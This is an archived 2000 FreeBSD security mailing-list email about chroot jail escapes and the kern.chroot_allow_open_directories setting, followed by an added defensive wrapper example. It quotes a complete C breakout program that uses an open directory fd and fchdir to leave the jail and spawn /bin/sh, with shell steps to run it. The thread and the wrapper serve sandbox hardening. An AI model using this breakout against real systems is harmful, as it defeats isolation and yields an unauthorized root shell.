From: Don Lewis
Message-Id: <200005231139.EAA13204@salsa.gv.tsc.tdk.com>
Date: Tue, 23 May 2000 04:39:35 -0700
In-Reply-To: <2780.958684841@critter.freebsd.dk>
References: <2780.958684841@critter.freebsd.dk>
X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98)
To: Poul-Henning Kamp, Harold Gutch
Cc: Cy Schubert - ITSD Open Systems Group, Paul Hart, Adam Laurie, freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output

On May 18, 11:20pm, Poul-Henning Kamp wrote:
} Subject: Re: envy.vuurwerk.nl daily run output
}
} Please check the action of the "kern.chroot_allow_open_directories"
} for a deeper explanation of this one.  It is not set to zero for
} fear of compatibility issues.  Maybe we should set it to zero in
} -current to see if there are any such issues.

That only protects against carelessly written chroot wrappers that leave
file descriptors open that point to directories outside the jail.  Given
that, even a non-root process can escape.
Even with kern.chroot_allow_open_directories disabled, I know of two ways
that a process can escape if it can fork() and can execute chroot() again
(the latter requires the process to be root), unless further modifications
have been made to the chroot syscall.  These changes have been in FreeBSD
4.x and later since last September.

} In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes:
} >What about the "other" chroot-breakout, does it still work under
} >FreeBSD 4.0?

Try statically linking the executable and doing:

	mkdir jail jail/tmp
	cp a.out jail
	chroot jail a.out

This code should be able to escape the jail in 3.x.  In 4.x it will be
able to escape jail/tmp (if kern.chroot_allow_open_directories is
enabled) but it won't be able to escape jail.

} >Here's the breakout-code modulo checks whether /tmp exists etc.
} >
} >#include <fcntl.h>
} >#include <stdlib.h>
} >#include <unistd.h>
} >
} >int main(int argc, char *argv[])
} >{
} >	int handle, i;
} >
} >	handle = open("/", O_RDONLY);	/* directory fd outside the new root */
} >	chroot("/tmp");
} >	chdir("/");
} >	fchdir(handle);
} >	for (i = 0; i < 32; i++)
} >		chdir("..");
} >	chroot(".");
} >	chdir("/");
} >	system("/bin/sh");
} >
} >	return 0;
} >}
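The "carelessly written chroot wrapper" case above, as an added example that is not code from this thread or from FreeBSD: a wrapper that applies in userland the same open-directory check that kern.chroot_allow_open_directories=0 enables in the kernel, and then drops root so chroot() cannot be called a second time from inside. The names count_open_dir_fds() and enter_jail() are this example's own.

```c
/* Added example, not code from the thread: a chroot wrapper that refuses
 * to enter the jail while any open descriptor refers to a directory (the
 * condition kern.chroot_allow_open_directories=0 makes the kernel reject),
 * then drops root so chroot() cannot be called again from inside.
 * count_open_dir_fds() and enter_jail() are this example's own names. */
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <sys/stat.h>
#include <unistd.h>

/* Count open descriptors that refer to directories (fstat on each slot). */
int count_open_dir_fds(void)
{
    long maxfd = sysconf(_SC_OPEN_MAX);
    int n = 0;
    if (maxfd < 0)
        maxfd = 1024;
    for (int fd = 0; fd < maxfd; fd++) {
        struct stat st;
        if (fstat(fd, &st) == 0 && S_ISDIR(st.st_mode))
            n++;
    }
    return n;
}

/* Make `dir` the new root and become uid/gid.  Returns 0 on success, -1
 * (errno set) if a directory fd is still open or any step fails.  Needs
 * root; on success the process is unprivileged when it returns. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (count_open_dir_fds() > 0) {
        errno = EPERM;  /* an open directory fd is a way back out */
        return -1;
    }
    if (chdir(dir) != 0 || chroot(dir) != 0 || chdir("/") != 0)
        return -1;
    /* Supplementary groups, gid, then uid: the order matters. */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    return 0;
}
```

A wrapper calls enter_jail() as root and then execv()s the target program using a path inside the new root; the count check is what makes the fchdir() trick in the quoted program impossible from the start.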